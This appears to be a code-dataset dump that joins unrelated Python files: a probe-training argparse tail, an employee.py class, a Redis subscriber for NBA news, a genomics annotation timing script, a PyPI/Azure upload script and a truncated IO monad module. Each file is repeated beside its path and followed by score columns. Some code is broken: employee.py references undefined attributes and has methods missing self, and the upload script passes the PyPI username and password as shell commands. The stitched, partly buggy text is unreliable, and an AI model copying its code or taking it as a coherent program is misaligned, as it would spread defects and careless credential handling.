OptionEnum.LAYER_IDX,
OptionEnum.PROBE_RANK,
OptionEnum.MODEL,
OptionEnum.NUM_EPOCHS,
OptionEnum.NUM_WORKERS,
OptionEnum.DEVICE,
OptionEnum.BATCH_SIZE,
OptionEnum.LR,
OptionEnum.EVAL_ONLY,
OptionEnum.USE_ZMT,
OptionEnum.OPTIMIZE_MEAN,
OptionEnum.DATASET,
OptionEnum.MAX_SEQ_LEN,
OptionEnum.INVERSE,
opt('--workspace-prefix', type=str, required=True),
opt('--no-mask-first', action='store_false', dest='mask_first'),
opt('--opt-limit', type=int),
opt('--zmt-limit', type=int, default=1000),
opt('--load-probe', action='store_true'),
opt('--load-weights', type=Path),
opt('--ranks', nargs='+', type=int, default=(1, 2, 3, 6, 12, 24, 48, 96, 192, 384, 576)),
opt('--no-basic-tokenize', action='store_false', dest='basic_tokenize'),
opt('--num-features', type=int, default=768),
opt('--objective', type=str, default='concept', choices=['concept', 'entropy', 'recon']),
opt('--mask-classes', type=int, nargs='+', default=[]),
opt('--l1-penalty', type=float, default=0),
opt('--dual', action='store_true'),
opt('--mask-weight', type=float, default=1))
args = apb.parser.parse_args()
if args.probe_rank:
args.ranks = (args.probe_rank,)
if args.num_workers is None:
args.num_workers = mp.cpu_count()
train(args)
if __name__ == '__main__':
main() | 0.66061 | 0.348146 |
import requests
class Employee:
min_hourly_wage = 17.91 #LAW
weeks_per_year = 52.0 #assume full-time
hours_per_week = 40.0 #assume full-time
min_superannuation_percent = 9.5
atCompanyDefault="<EMAIL>"
min_salary = min_hourly_wage * hours_per_week * weeks_per_year #LAW #assume full-time
def __init__(self,firstName,lastName,salary_parm=min_salary):
self.firstName=firstName[0].upper() + firstName[1:].lower()
self.lastName=lastName[0].upper() + lastName[1:].lower()
self.fullName = '{} {}'.format(self.firstName,self.lastName)
# self.email()
## tom = self.tell_email()
self.salary=salary_parm
def apply_raise_hidden(self,percent):
new_salary = self.salary * (1 + percent/100)
self.min_salary = self.min_hourly_wage * self.hours_per_week * self.weeks_per_year #LAW #assume full-time
if self.salary < self.min_salary: #LAW #assume full-time
#assume full-time
self.salary = self.min_salary #LAW #assume full-time
print( self.fullName + " is on minimum p.a. " + str(self.min_salary))
else:
self.salary = self.new_salary
def apply_raise_201805():
self.apply_raise_hidden(self,1.0)
def apply_raise_201711():
self.apply_raise_hidden(self,-1.1)
def change_name(self,fullname): #,atCompany=self.atCompanyDefault):
self.fullName=fullname
self.email=name.lower().replace(" ","_") + atCompany
fred = self.tell_email()
print(" new email is "+self.email)
def tell_email(self,url=f"https://www.google.com/"):
response = requests.get(url)
if response.ok:
return response.text
else:
return '_bad response!'
@property
def email(self): #,atCompany=self.atCompanyDefault):
return '{}.{}'.format(self.firstName.lower(),self.lastName.lower())+"@<EMAIL>" #+atCompany | employee.py | import requests
class Employee:
min_hourly_wage = 17.91 #LAW
weeks_per_year = 52.0 #assume full-time
hours_per_week = 40.0 #assume full-time
min_superannuation_percent = 9.5
atCompanyDefault="<EMAIL>"
min_salary = min_hourly_wage * hours_per_week * weeks_per_year #LAW #assume full-time
def __init__(self,firstName,lastName,salary_parm=min_salary):
self.firstName=firstName[0].upper() + firstName[1:].lower()
self.lastName=lastName[0].upper() + lastName[1:].lower()
self.fullName = '{} {}'.format(self.firstName,self.lastName)
# self.email()
## tom = self.tell_email()
self.salary=salary_parm
def apply_raise_hidden(self,percent):
new_salary = self.salary * (1 + percent/100)
self.min_salary = self.min_hourly_wage * self.hours_per_week * self.weeks_per_year #LAW #assume full-time
if self.salary < self.min_salary: #LAW #assume full-time
#assume full-time
self.salary = self.min_salary #LAW #assume full-time
print( self.fullName + " is on minimum p.a. " + str(self.min_salary))
else:
self.salary = self.new_salary
def apply_raise_201805():
self.apply_raise_hidden(self,1.0)
def apply_raise_201711():
self.apply_raise_hidden(self,-1.1)
def change_name(self,fullname): #,atCompany=self.atCompanyDefault):
self.fullName=fullname
self.email=name.lower().replace(" ","_") + atCompany
fred = self.tell_email()
print(" new email is "+self.email)
def tell_email(self,url=f"https://www.google.com/"):
response = requests.get(url)
if response.ok:
return response.text
else:
return '_bad response!'
@property
def email(self): #,atCompany=self.atCompanyDefault):
return '{}.{}'.format(self.firstName.lower(),self.lastName.lower())+"@<EMAIL>" #+atCompany | 0.210848 | 0.064036 |
import datetime
import json
import logging
import logging.config
import redis
from environment import REDIS_URL, REDIS_PLAYER_NEWS_CHANNEL_NAME, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME, \
REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME
from nba_player_news.data.publishers import PlayerNewsSubscriptionsMessagesPublisher
from nba_player_news.data.senders import FacebookMessager
from nba_player_news.data.subscriber_event.processors import FacebookSubscriberEventProcessor
from nba_player_news.models import Subscription, SubscriptionAttempt, SubscriptionAttemptResult
class BaseSubscriber:
logger = logging.getLogger("subscriber")
def __init__(self, subscription_channel_name):
self.subscription_channel_name = subscription_channel_name
self.redis_client = redis.StrictRedis().from_url(url=REDIS_URL)
self.publisher_subscriber = self.redis_client.pubsub()
def process_messages(self):
self.publisher_subscriber.subscribe(self.subscription_channel_name)
BaseSubscriber.logger.info("Started processing messages at {now}".format(now=datetime.datetime.now()))
while True:
message = self.publisher_subscriber.get_message()
if message and message["type"] == "message":
BaseSubscriber.logger.info("Processing message: {message}".format(message=message))
try:
self.process_message(message=json.loads(message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
BaseSubscriber.logger.error(e.message)
def process_message(self, message):
raise NotImplementedError()
class PlayerNewsSubscriber(BaseSubscriber):
def __init__(self):
self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()
BaseSubscriber.__init__(self, REDIS_PLAYER_NEWS_CHANNEL_NAME)
def process_message(self, message):
self.player_news_subscriptions_messages_publisher.publish(player_news=message)
class SubscriberEventsSubscriber(BaseSubscriber):
def __init__(self):
self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
BaseSubscriber.__init__(self, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)
def process_message(self, message):
if message["platform"] == "facebook":
self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
else:
PlayerNewsSubscriber.logger.info("Unknown message: {message}".format(message=message))
class SubscriptionMessagesSubscriber(BaseSubscriber):
def __init__(self):
self.facebook_messager = FacebookMessager()
BaseSubscriber.__init__(self, REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)
def process_message(self, message):
subscription = Subscription.objects.get(platform=message["platform"],
platform_identifier=message["platform_identifier"])
if message["platform"] == "facebook":
PlayerNewsSubscriber.logger.info("Sending message: {message} to user: {user}"
.format(message=message["text"], user=message["platform_identifier"]))
subscription_attempt = SubscriptionAttempt.objects.create(subscription=subscription, message=message["text"][:2048])
response = self.facebook_messager.send(recipient_id=message["platform_identifier"], message=message["text"])
successful = response.status_code == 200
SubscriptionAttemptResult.objects.create(subscription_attempt=subscription_attempt, successful=successful,
response=response.text[:2048])
else:
PlayerNewsSubscriber.logger.info("Unknown message: {}".format(message))
class AllSubscribers:
# Helper class for saving money on Heroku
# Contains a lot of duplicate logic
logger = logging.getLogger("subscriber")
def __init__(self):
self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
self.facebook_messager = FacebookMessager()
self.redis_client = redis.StrictRedis().from_url(url=REDIS_URL)
self.player_news_publisher_subscriber = self.redis_client.pubsub()
self.subscriber_events_publisher_subscriber = self.redis_client.pubsub()
self.subscription_messages_publisher_subscriber = self.redis_client.pubsub()
self.player_news_publisher_subscriber.subscribe(REDIS_PLAYER_NEWS_CHANNEL_NAME)
self.subscriber_events_publisher_subscriber.subscribe(REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)
self.subscription_messages_publisher_subscriber.subscribe(REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)
self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()
def process_messages(self):
AllSubscribers.logger.info("Started subscribing to all messages at {now}".format(now=datetime.datetime.now()))
while True:
# Process player news
player_news_message = self.player_news_publisher_subscriber.get_message()
if player_news_message and player_news_message["type"] == "message":
try:
self.player_news_subscriptions_messages_publisher.publish(player_news=json.loads(player_news_message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
AllSubscribers.logger.error(e.message)
# Process subscriber events
subscriber_event_message = self.subscriber_events_publisher_subscriber.get_message()
if subscriber_event_message and subscriber_event_message["type"] == "message":
try:
self.process_subscriber_message(message=json.loads(subscriber_event_message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
AllSubscribers.logger.error(e.message)
# Process subscription events
subscription_event_message = self.subscription_messages_publisher_subscriber.get_message()
if subscription_event_message and subscription_event_message["type"] == "message":
try:
self.process_subscription_message(message=json.loads(subscription_event_message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
AllSubscribers.logger.error(e.message)
def process_subscriber_message(self, message):
if message["platform"] == "facebook":
self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
else:
AllSubscribers.logger.info("Unknown message: {}".format(message))
def process_subscription_message(self, message):
subscription = Subscription.objects.get(platform=message["platform"],
platform_identifier=message["platform_identifier"])
if message["platform"] == "facebook":
AllSubscribers.logger.info("Sending message: {message} to user: {user}".format(message=message["text"],
user=message["platform_identifier"]))
subscription_attempt = SubscriptionAttempt.objects.create(subscription=subscription, message=message["text"][:2048])
response = self.facebook_messager.send(recipient_id=message["platform_identifier"], message=message["text"])
successful = response.status_code == 200
SubscriptionAttemptResult.objects.create(subscription_attempt=subscription_attempt, successful=successful,
response=response.text[:2048])
else:
PlayerNewsSubscriber.logger.info("Unknown message: {}".format(message)) | nba_player_news/data/subscribers.py | import datetime
import json
import logging
import logging.config
import redis
from environment import REDIS_URL, REDIS_PLAYER_NEWS_CHANNEL_NAME, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME, \
REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME
from nba_player_news.data.publishers import PlayerNewsSubscriptionsMessagesPublisher
from nba_player_news.data.senders import FacebookMessager
from nba_player_news.data.subscriber_event.processors import FacebookSubscriberEventProcessor
from nba_player_news.models import Subscription, SubscriptionAttempt, SubscriptionAttemptResult
class BaseSubscriber:
logger = logging.getLogger("subscriber")
def __init__(self, subscription_channel_name):
self.subscription_channel_name = subscription_channel_name
self.redis_client = redis.StrictRedis().from_url(url=REDIS_URL)
self.publisher_subscriber = self.redis_client.pubsub()
def process_messages(self):
self.publisher_subscriber.subscribe(self.subscription_channel_name)
BaseSubscriber.logger.info("Started processing messages at {now}".format(now=datetime.datetime.now()))
while True:
message = self.publisher_subscriber.get_message()
if message and message["type"] == "message":
BaseSubscriber.logger.info("Processing message: {message}".format(message=message))
try:
self.process_message(message=json.loads(message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
BaseSubscriber.logger.error(e.message)
def process_message(self, message):
raise NotImplementedError()
class PlayerNewsSubscriber(BaseSubscriber):
def __init__(self):
self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()
BaseSubscriber.__init__(self, REDIS_PLAYER_NEWS_CHANNEL_NAME)
def process_message(self, message):
self.player_news_subscriptions_messages_publisher.publish(player_news=message)
class SubscriberEventsSubscriber(BaseSubscriber):
def __init__(self):
self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
BaseSubscriber.__init__(self, REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)
def process_message(self, message):
if message["platform"] == "facebook":
self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
else:
PlayerNewsSubscriber.logger.info("Unknown message: {message}".format(message=message))
class SubscriptionMessagesSubscriber(BaseSubscriber):
def __init__(self):
self.facebook_messager = FacebookMessager()
BaseSubscriber.__init__(self, REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)
def process_message(self, message):
subscription = Subscription.objects.get(platform=message["platform"],
platform_identifier=message["platform_identifier"])
if message["platform"] == "facebook":
PlayerNewsSubscriber.logger.info("Sending message: {message} to user: {user}"
.format(message=message["text"], user=message["platform_identifier"]))
subscription_attempt = SubscriptionAttempt.objects.create(subscription=subscription, message=message["text"][:2048])
response = self.facebook_messager.send(recipient_id=message["platform_identifier"], message=message["text"])
successful = response.status_code == 200
SubscriptionAttemptResult.objects.create(subscription_attempt=subscription_attempt, successful=successful,
response=response.text[:2048])
else:
PlayerNewsSubscriber.logger.info("Unknown message: {}".format(message))
class AllSubscribers:
# Helper class for saving money on Heroku
# Contains a lot of duplicate logic
logger = logging.getLogger("subscriber")
def __init__(self):
self.facebook_subscriber_event_processor = FacebookSubscriberEventProcessor()
self.facebook_messager = FacebookMessager()
self.redis_client = redis.StrictRedis().from_url(url=REDIS_URL)
self.player_news_publisher_subscriber = self.redis_client.pubsub()
self.subscriber_events_publisher_subscriber = self.redis_client.pubsub()
self.subscription_messages_publisher_subscriber = self.redis_client.pubsub()
self.player_news_publisher_subscriber.subscribe(REDIS_PLAYER_NEWS_CHANNEL_NAME)
self.subscriber_events_publisher_subscriber.subscribe(REDIS_SUBSCRIBER_EVENTS_CHANNEL_NAME)
self.subscription_messages_publisher_subscriber.subscribe(REDIS_SUBSCRIPTION_MESSAGES_CHANNEL_NAME)
self.player_news_subscriptions_messages_publisher = PlayerNewsSubscriptionsMessagesPublisher()
def process_messages(self):
AllSubscribers.logger.info("Started subscribing to all messages at {now}".format(now=datetime.datetime.now()))
while True:
# Process player news
player_news_message = self.player_news_publisher_subscriber.get_message()
if player_news_message and player_news_message["type"] == "message":
try:
self.player_news_subscriptions_messages_publisher.publish(player_news=json.loads(player_news_message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
AllSubscribers.logger.error(e.message)
# Process subscriber events
subscriber_event_message = self.subscriber_events_publisher_subscriber.get_message()
if subscriber_event_message and subscriber_event_message["type"] == "message":
try:
self.process_subscriber_message(message=json.loads(subscriber_event_message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
AllSubscribers.logger.error(e.message)
# Process subscription events
subscription_event_message = self.subscription_messages_publisher_subscriber.get_message()
if subscription_event_message and subscription_event_message["type"] == "message":
try:
self.process_subscription_message(message=json.loads(subscription_event_message["data"]))
except BaseException as e:
# Catch all exceptions so subscriber doesn't die
AllSubscribers.logger.error(e.message)
def process_subscriber_message(self, message):
if message["platform"] == "facebook":
self.facebook_subscriber_event_processor.process(subscriber_event_message=message)
else:
AllSubscribers.logger.info("Unknown message: {}".format(message))
def process_subscription_message(self, message):
subscription = Subscription.objects.get(platform=message["platform"],
platform_identifier=message["platform_identifier"])
if message["platform"] == "facebook":
AllSubscribers.logger.info("Sending message: {message} to user: {user}".format(message=message["text"],
user=message["platform_identifier"]))
subscription_attempt = SubscriptionAttempt.objects.create(subscription=subscription, message=message["text"][:2048])
response = self.facebook_messager.send(recipient_id=message["platform_identifier"], message=message["text"])
successful = response.status_code == 200
SubscriptionAttemptResult.objects.create(subscription_attempt=subscription_attempt, successful=successful,
response=response.text[:2048])
else:
PlayerNewsSubscriber.logger.info("Unknown message: {}".format(message)) | 0.352202 | 0.054199 |
import sys
import os
import time
import toolshed as ts
files = [
dict(file="ESP6500SI.all.snps_indels.tidy.v2.vcf.gz",
fields=["EA_AC", "AA_AC"],
names=["esp_ea", "esp_aa"],
ops=["first", "first"]),
dict(file="ExAC.r0.3.sites.vep.tidy.vcf.gz",
fields=["AC_Adj", "AC_Het", "AC_Hom", "AC_NFE"],
names=["exac_AC_Adj", "exac_AC_Het", "exac_AC_Hom", "exac_AC_NFE"],
ops=["first", "first", "first", "first"]),
dict(file="hg19_fitcons_fc-i6-0_V1-01.bed.gz",
columns=[4],
names=["fitcons_mean"],
ops=["mean"],
h="fitcons.hdr",
c="CHROM,FROM,TO,FITCONS"),
dict(file="ALL.wgs.phase3_shapeit2_mvncall_integrated_v5a.20130502.sites.tidy.vcf.gz",
fields=["EAS_AF", "AMR_AF"],
names=["1kg_eas_af", "1kg_amr_af"],
ops=["first", "first"]),
dict(file="GRCh37-gms-mappability.vcf.gz",
fields=["GMS_illumina"],
names=["gms_mappapility"],
ops=["first"]),
dict(file="clinvar_20150305.tidy.vcf.gz",
fields=["CLNHGVS"],
names=["clinvar_hgvs"],
ops=["first"]),
dict(file="cosmic-v68-GRCh37.tidy.vcf.gz",
fields=["ID"],
names=["cosmic_id"],
ops=["concat"]),
dict(file="dbsnp.b141.20140813.hg19.tidy.vcf.gz",
fields=["RS"],
names=["dbsnp_id"],
ops=["concat"]),
dict(file="hg19.gerp.elements.bed.gz",
columns=[4],
names=["gerp"],
ops=["mean"],
h="gerp.hdr",
c="CHROM,FROM,TO,GERP"),
]
def get():
base = "http://s3.amazonaws.com/gemini-annotations/"
try:
os.mkdir("data")
except OSError:
pass
for f in files:
f = f['file']
if not (os.path.exists("data/" + f) and os.path.exists("data/" + f + ".tbi")):
cmd = ("|wget -O tmp.tt.gz {base}{f} && sleep 2 && ./vcfsort.sh tmp.tt.gz | bgzip -c > data/{f} && sleep 2 && tabix -f data/{f}; rm -f tmp.tt.gz".format(**locals()))
list(ts.nopen(cmd))
get()
def asanno(d):
c = "fields={fields}" if "fields" in d else "columns={columns}"
tmpl = """
[[annotation]]
file="{file}"
names={names}
ops={ops}
""" + c + "\n"
return tmpl.format(**d)
def asbcf(d):
d['cols'] = "+" + ",+".join(d['fields']) if 'fields' in d else d["c"]
d['hdr'] = "-h " + d['h'] if 'h' in d else ""
return 'bcftools annotate -a {DATA}/{file} -c "{cols}" {hdr}'.format(**d)
with open('fitcons.hdr', 'w') as fh:
fh.write('##INFO=<ID=FITCONS,Number=1,Type=Float,Description="FITCONS VALUE">\n')
with open('gerp.hdr', 'w') as fh:
fh.write('##INFO=<ID=GERP,Number=1,Type=Float,Description="GERP VALUE">\n')
toml = "compare.toml"
with open(toml, "w") as fh:
for d in files:
fh.write(asanno(d))
DATA = 'data'
QUERY = "data/ExAC.r0.3.sites.vep.tidy.vcf.gz"
for f in files:
f['DATA'] = DATA
f['QUERY'] = QUERY
commands = [asbcf(f) for f in files]
query = QUERY.format(DATA=DATA)
fnames = [f['DATA'] + "/" + f['file'] for f in files]
bedtools_cmd = ("bedtools intersect -sorted -sortout -wao -a {query} -b " + " -b ".join(fnames)).format(query=query)
# TODO: send to file to match bcftools and vcfanno
fh = open("timing.txt", "w")
print >>fh, "method\ti\tseconds\tprocs"
t = time.time()
list(ts.nopen("|%s | bgzip -c > /tmp/trash.gz" % bedtools_cmd))
print >>fh, "bedtools\t%d\t%.2f\t1" % (len(commands), time.time() - t)
for procs in (1, 4, 8, 12):
if procs == 1:
tottime = 0
for i in range(len(commands)):
out = "tmp%d.vcf.gz" % i
try:
os.unlink("tmp%d.vcf.gz" % (i - 2))
except OSError:
pass
query = QUERY.format(DATA=DATA) if i == 0 else ("tmp%d.vcf.gz" % (i - 1))
cmd = commands[i] + " {query} | bgzip -c > {out}; tabix {out} ".format(DATA=DATA, query=query, out=out)
print >>sys.stderr, cmd
t = time.time()
res = list(ts.nopen("|%s" % cmd))
t1 = time.time()
tottime += t1 - t
print >>fh, "bcftools\t%d\t%.2f\t1" % (i+1, tottime)
sys.stdout.flush()
vcmd = "vcfanno -p {procs} -base-path {DATA} {toml} {QUERY} | bgzip -c > /dev/null".format(
DATA=DATA, procs=procs, QUERY=QUERY, toml=toml)
print >>sys.stderr, vcmd
#print vcmd
t = time.time()
res = list(ts.nopen("|%s" % vcmd))
t1 = time.time()
print >>fh, "vcfanno\t%d\t%.2f\t%d" % (i+1, t1 - t, procs) | scripts/paper/timing.py | import sys
import os
import time
import toolshed as ts
files = [
dict(file="ESP6500SI.all.snps_indels.tidy.v2.vcf.gz",
fields=["EA_AC", "AA_AC"],
names=["esp_ea", "esp_aa"],
ops=["first", "first"]),
dict(file="ExAC.r0.3.sites.vep.tidy.vcf.gz",
fields=["AC_Adj", "AC_Het", "AC_Hom", "AC_NFE"],
names=["exac_AC_Adj", "exac_AC_Het", "exac_AC_Hom", "exac_AC_NFE"],
ops=["first", "first", "first", "first"]),
dict(file="hg19_fitcons_fc-i6-0_V1-01.bed.gz",
columns=[4],
names=["fitcons_mean"],
ops=["mean"],
h="fitcons.hdr",
c="CHROM,FROM,TO,FITCONS"),
dict(file="ALL.wgs.phase3_shapeit2_mvncall_integrated_v5a.20130502.sites.tidy.vcf.gz",
fields=["EAS_AF", "AMR_AF"],
names=["1kg_eas_af", "1kg_amr_af"],
ops=["first", "first"]),
dict(file="GRCh37-gms-mappability.vcf.gz",
fields=["GMS_illumina"],
names=["gms_mappapility"],
ops=["first"]),
dict(file="clinvar_20150305.tidy.vcf.gz",
fields=["CLNHGVS"],
names=["clinvar_hgvs"],
ops=["first"]),
dict(file="cosmic-v68-GRCh37.tidy.vcf.gz",
fields=["ID"],
names=["cosmic_id"],
ops=["concat"]),
dict(file="dbsnp.b141.20140813.hg19.tidy.vcf.gz",
fields=["RS"],
names=["dbsnp_id"],
ops=["concat"]),
dict(file="hg19.gerp.elements.bed.gz",
columns=[4],
names=["gerp"],
ops=["mean"],
h="gerp.hdr",
c="CHROM,FROM,TO,GERP"),
]
def get():
base = "http://s3.amazonaws.com/gemini-annotations/"
try:
os.mkdir("data")
except OSError:
pass
for f in files:
f = f['file']
if not (os.path.exists("data/" + f) and os.path.exists("data/" + f + ".tbi")):
cmd = ("|wget -O tmp.tt.gz {base}{f} && sleep 2 && ./vcfsort.sh tmp.tt.gz | bgzip -c > data/{f} && sleep 2 && tabix -f data/{f}; rm -f tmp.tt.gz".format(**locals()))
list(ts.nopen(cmd))
get()
def asanno(d):
c = "fields={fields}" if "fields" in d else "columns={columns}"
tmpl = """
[[annotation]]
file="{file}"
names={names}
ops={ops}
""" + c + "\n"
return tmpl.format(**d)
def asbcf(d):
d['cols'] = "+" + ",+".join(d['fields']) if 'fields' in d else d["c"]
d['hdr'] = "-h " + d['h'] if 'h' in d else ""
return 'bcftools annotate -a {DATA}/{file} -c "{cols}" {hdr}'.format(**d)
with open('fitcons.hdr', 'w') as fh:
fh.write('##INFO=<ID=FITCONS,Number=1,Type=Float,Description="FITCONS VALUE">\n')
with open('gerp.hdr', 'w') as fh:
fh.write('##INFO=<ID=GERP,Number=1,Type=Float,Description="GERP VALUE">\n')
toml = "compare.toml"
with open(toml, "w") as fh:
for d in files:
fh.write(asanno(d))
DATA = 'data'
QUERY = "data/ExAC.r0.3.sites.vep.tidy.vcf.gz"
for f in files:
f['DATA'] = DATA
f['QUERY'] = QUERY
commands = [asbcf(f) for f in files]
query = QUERY.format(DATA=DATA)
fnames = [f['DATA'] + "/" + f['file'] for f in files]
bedtools_cmd = ("bedtools intersect -sorted -sortout -wao -a {query} -b " + " -b ".join(fnames)).format(query=query)
# TODO: send to file to match bcftools and vcfanno
fh = open("timing.txt", "w")
print >>fh, "method\ti\tseconds\tprocs"
t = time.time()
list(ts.nopen("|%s | bgzip -c > /tmp/trash.gz" % bedtools_cmd))
print >>fh, "bedtools\t%d\t%.2f\t1" % (len(commands), time.time() - t)
for procs in (1, 4, 8, 12):
if procs == 1:
tottime = 0
for i in range(len(commands)):
out = "tmp%d.vcf.gz" % i
try:
os.unlink("tmp%d.vcf.gz" % (i - 2))
except OSError:
pass
query = QUERY.format(DATA=DATA) if i == 0 else ("tmp%d.vcf.gz" % (i - 1))
cmd = commands[i] + " {query} | bgzip -c > {out}; tabix {out} ".format(DATA=DATA, query=query, out=out)
print >>sys.stderr, cmd
t = time.time()
res = list(ts.nopen("|%s" % cmd))
t1 = time.time()
tottime += t1 - t
print >>fh, "bcftools\t%d\t%.2f\t1" % (i+1, tottime)
sys.stdout.flush()
vcmd = "vcfanno -p {procs} -base-path {DATA} {toml} {QUERY} | bgzip -c > /dev/null".format(
DATA=DATA, procs=procs, QUERY=QUERY, toml=toml)
print >>sys.stderr, vcmd
#print vcmd
t = time.time()
res = list(ts.nopen("|%s" % vcmd))
t1 = time.time()
print >>fh, "vcfanno\t%d\t%.2f\t%d" % (i+1, t1 - t, procs) | 0.098074 | 0.149873 |
import os
import shutil
from base_automation import report
from base_automation.utilities import shared_utilities
@report.utils.step('delete dist directory')
def delete_dist_dir(dist_dir):
if os.path.exists(dist_dir) and os.path.isdir(dist_dir):
shutil.rmtree(dist_dir)
else:
print("The dist directory does not exist")
@report.utils.step("build")
def build():
build_commands = ["python setup.py develop",
"python -m pip install --upgrade pip",
"python -m pip install --upgrade build", "python -m build"]
for command in build_commands:
shared_utilities.terminal_command(command)
@report.utils.step("upload artifact to {azure_feed_name}")
def upload_azure_artifact(azure_feed_name):
upload_commands = ["python setup.py sdist bdist_wheel", f"twine upload -r {azure_feed_name} dist/*"]
for command in upload_commands:
shared_utilities.terminal_command(command)
@report.utils.step("upload artifact to {azure_feed_name}")
def upload_azure_artifact(azure_feed_name):
upload_commands = ["python setup.py sdist bdist_wheel", f"twine upload -r {azure_feed_name} dist/*"]
for command in upload_commands:
shared_utilities.terminal_command(command)
@report.utils.step("upload pypi to {repository_url}")
def upload_pypi_artifact():
upload_commands = ["python setup.py sdist bdist_wheel",
f"twine upload --repository-url https://upload.pypi.org/legacy/ dist/*",
f"{shared_utilities.get_environment_variable('pypi-user')}",
f"{shared_utilities.get_environment_variable('pypi-password')}"]
for command in upload_commands:
shared_utilities.terminal_command(command)
@report.utils.feature('Build & Upload New Artifact To Azure') # A sub-function function at large
@report.utils.severity("normal") # Priority of test cases - 'blocker', 'critical', 'normal', 'minor', 'trivial'
def run_process(dist_dir, azure_feeds: list = None, azure_artifact: bool = False, pypi_artifact: bool = False):
delete_dist_dir(dist_dir)
build()
if pypi_artifact:
upload_pypi_artifact()
if azure_artifact:
for feed in azure_feeds:
upload_azure_artifact(feed) | base_automation/upload_artifact.py | import os
import shutil
from base_automation import report
from base_automation.utilities import shared_utilities
@report.utils.step('delete dist directory')
def delete_dist_dir(dist_dir):
if os.path.exists(dist_dir) and os.path.isdir(dist_dir):
shutil.rmtree(dist_dir)
else:
print("The dist directory does not exist")
@report.utils.step("build")
def build():
build_commands = ["python setup.py develop",
"python -m pip install --upgrade pip",
"python -m pip install --upgrade build", "python -m build"]
for command in build_commands:
shared_utilities.terminal_command(command)
@report.utils.step("upload artifact to {azure_feed_name}")
def upload_azure_artifact(azure_feed_name):
upload_commands = ["python setup.py sdist bdist_wheel", f"twine upload -r {azure_feed_name} dist/*"]
for command in upload_commands:
shared_utilities.terminal_command(command)
@report.utils.step("upload artifact to {azure_feed_name}")
def upload_azure_artifact(azure_feed_name):
upload_commands = ["python setup.py sdist bdist_wheel", f"twine upload -r {azure_feed_name} dist/*"]
for command in upload_commands:
shared_utilities.terminal_command(command)
@report.utils.step("upload pypi to {repository_url}")
def upload_pypi_artifact():
upload_commands = ["python setup.py sdist bdist_wheel",
f"twine upload --repository-url https://upload.pypi.org/legacy/ dist/*",
f"{shared_utilities.get_environment_variable('pypi-user')}",
f"{shared_utilities.get_environment_variable('pypi-password')}"]
for command in upload_commands:
shared_utilities.terminal_command(command)
@report.utils.feature('Build & Upload New Artifact To Azure') # A sub-function function at large
@report.utils.severity("normal") # Priority of test cases - 'blocker', 'critical', 'normal', 'minor', 'trivial'
def run_process(dist_dir, azure_feeds: list = None, azure_artifact: bool = False, pypi_artifact: bool = False):
delete_dist_dir(dist_dir)
build()
if pypi_artifact:
upload_pypi_artifact()
if azure_artifact:
for feed in azure_feeds:
upload_azure_artifact(feed) | 0.271252 | 0.103477 |
from typing import Any, Callable, Generic, TypeVar, Tuple, Optional
from .typing import Applicative
from .typing import Functor
from .typing import Monad
from .util import indent as ind
TSource = TypeVar("TSource")
TResult = TypeVar("TResult")
class IO(Generic[TSource]):
"""A container for a world remaking function.
IO Actions specify something that can be done. They are not active
in and of themselves. They need to be "run" to make something
happen. Simply having an action lying around doesn't make anything
happen.
"""
def __init__(self, value: Optional[TSource] = None) -> None:
"""Create IO Action."""
super().__init__()
self._value = value
@classmethod
def unit(cls, value: TSource):
return cls(value)
def bind(self, func: Callable[[Optional[TSource]], "IO[Optional[TResult]]"]) -> "IO[Optional[TResult]]":
"""IO a -> (a -> IO b) -> IO b."""
return func(self._value)
@classmethod
def pure(
cls, value: Optional[Callable[[Optional[TSource]], Optional[TResult]]]
) -> "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]":
return IO(value)
def apply(
self: "IO[Optional[Callable[[Optional[TSource]], Optional[TResult]]]]", something: "IO[Optional[TSource]]"
) -> "IO[Optional[TResult]]":
"""Apply wrapped function over something."""
assert self._value is not None
return something.map(self._value)
def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "IO[Optional[TResult]]":
return IO(func(self._value))
def run(self, world: int) -> Optional[TSource]:
"""Run IO action."""
return self._value
def __or__(self, func):
"""Use | as operator for bind.
Provide the | operator instead of the Haskell >>= operator
"""
return self.bind(func)
def __call__(self, world: int = 0) -> Any:
"""Nothing more to run."""
return self.run(world)
def __str__(self, m: int = 0, n: int = 0) -> str:
a = self._value
return "%sReturn %s" % (ind(m), [a])
def __repr__(self) -> str:
return self.__str__()
class Put(IO):
"""The Put action.
A container holding a string to be printed to stdout, followed by
another IO Action.
"""
def __init__(self, text: str, action: IO) -> None:
super().__init__((text, action))
def bind(self, func: Callable[[Optional[TSource]], IO[Optional[TResult]]]) -> "Put":
"""IO a -> (a -> IO b) -> IO b"""
assert self._value is not None
text, a = self._value
return Put(text, a.bind(func))
def map(self, func: Callable[[Optional[TSource]], Optional[TResult]]) -> "Put":
# Put s (fmap f io)
assert self._value is not None
text, action = self._value
return Put(text, action.map(func))
def run(self, world: int) -> IO:
"""Run IO action"""
assert self._value is not None
text, action = self._value
new_world = pure_print(world, text)
return action(world=new_world)
